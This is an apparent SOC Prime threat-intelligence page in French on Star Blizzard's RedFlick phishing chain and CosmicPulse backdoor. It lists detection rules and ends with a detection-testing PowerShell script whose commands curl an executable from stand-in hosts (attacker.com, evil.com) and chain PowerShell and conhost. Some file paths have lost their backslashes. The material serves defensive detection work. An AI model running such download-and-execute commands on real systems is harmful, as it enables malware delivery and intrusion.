SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

Star Blizzard utilise RedFlick pour améliorer le phishing et le déploiement de logiciels malveillants

Author Photo
SOC Prime Team linkedin icon Suivre
Star Blizzard utilise RedFlick pour améliorer le phishing et le déploiement de logiciels malveillants
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

L’agent parrainé par l’État russe, Star Blizzard, a évolué dans son savoir-faire en utilisant la technique RedFlick pour livrer la porte dérobée CosmicPulse. L’acteur est passé de campagnes de spear-phishing ciblées à des campagnes de phishing automatisées à plus grande échelle utilisant des sites compromis. Ces campagnes utilisent des méthodes de livraison sophistiquées, y compris des fichiers VHDX et des charges utiles cachées dans des fichiers PDF pour échapper à la détection.

Enquête

Microsoft Threat Intelligence a analysé diverses vagues de phishing observées tout au long de 2026, identifiant une transition des chaînes basées sur ClickFix vers des tâches planifiées RedFlick. L’enquête a détaillé un flux d’exécution en plusieurs étapes impliquant des fichiers LNK, l’exécution de commandes locales SSH et l’utilisation de WebDAV pour la récupération de charges utiles distantes. L’analyse technique a également révélé l’utilisation de la stéganographie et du chiffrement basé sur le registre pour la charge utile CosmicPulse.

Atténuation

Les organisations doivent mettre en œuvre une authentification résistante au phishing et des politiques d’accès conditionnel pour sécuriser les identités. La protection des points de terminaison doit être configurée avec EDR en mode bloc et la protection antivirus en temps réel activée. De plus, la mise en œuvre de règles de réduction de la surface d’attaque peut prévenir l’exécution de scripts obscurcis et de fichiers exécutables non autorisés.

Réponse

Lors de la détection, les équipes de sécurité doivent utiliser l’EDR pour remédier aux artefacts malveillants et enquêter sur les tentatives de connexion suspectes. Les modes d’enquête et de remédiation automatisées doivent être activés pour réduire les temps de réponse. Les organisations doivent également utiliser des solutions anti-phishing avancées et la purge automatique zéro heure pour neutraliser les communications malveillantes entrantes.

Flux d’attaque

Nous mettons toujours à jour cette partie.

Détections

Ligne de commande suspecte contenant un chemin UNC avec un exécutable comme argument (via cmdline)

Équipe SOC Prime
30 septembre 2026

Découverte possible de partages réseau (via cmdline)

Équipe SOC Prime
30 septembre 2026

Tentatives d’installation cachées de l’installateur distant MsiExec suspectes (via cmdline)

Équipe SOC Prime
30 septembre 2026

LOLBAS Conhost (via cmdline)

Équipe SOC Prime
30 septembre 2026

Utilisation possible d’un outil de tunneling [Windows] (via cmdline)

Équipe SOC Prime
30 septembre 2026

Utilisation suspecte de CURL (via cmdline)

Équipe SOC Prime
30 septembre 2026

Commande et contrôle suspect par requête DNS de domaine de premier niveau (TLD) inhabituel (via dns)

Équipe SOC Prime
30 septembre 2026

IOCs (HashSha256) pour détecter : Star Blizzard affine le phishing et la livraison de logiciels malveillants avec la technique RedFlick

Règles d’IA de SOC Prime
30 septembre 2026

IOCs (SourceIP) pour détecter : Star Blizzard affine le phishing et la livraison de logiciels malveillants avec la technique RedFlick

Règles d’IA de SOC Prime
30 septembre 2026

IOCs (DestinationIP) pour détecter : Star Blizzard affine le phishing et la livraison de logiciels malveillants avec la technique RedFlick

Règles d’IA de SOC Prime
30 septembre 2026

Détection de l’exécution de PowerShell à partir d’un PDF téléchargé [Windows Powershell]

Règles d’IA de SOC Prime
30 septembre 2026

Détection de la technique RedFlick de Star Blizzard – Tâches planifiées et exécution en ligne de commande [Création de processus Windows]

Règles d’IA de SOC Prime
30 septembre 2026

Exécution de simulation

  • Narrative & Commandes de l’attaque : L’adversaire livre un e-mail de phishing contenant un lien vers un fichier malveillant. Lors de l’interaction, une séquence est déclenchée où curl est utilisé pour récupérer une étape secondaire. Pour se fondre dans les processus système, la commande est conçue pour inclure explicitement les termes PowerShell, PDF (référençant la source du déclencheur), et conhost.exe dans la chaîne de commande pour correspondre à la logique de la règle de détection cible. L’objectif est d’exécuter une charge utile décodée intégrée dans une structure PDF.

  • Script de test de régression :

    # Script de simulation pour déclencher la règle 'Détecter l'exécution de PowerShell à partir de PDF téléchargé'.
    # Ce script construit une chaîne de ligne de commande incluant les quatre mots-clés requis.
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe & PowerShell.exe -Command `& {Write-Host 'Extraction depuis PDF...'; Start-Process conhost.exe}"
    
    # Nous exécutons via cmd pour garantir que conhost.exe fait partie de l'arborescence des processus/contexte de commande
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extraction depuis PDF... utilisant conhost.exe`""
  • Commandes de nettoyage :

    # Nettoyer les fichiers générés lors de la simulation
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue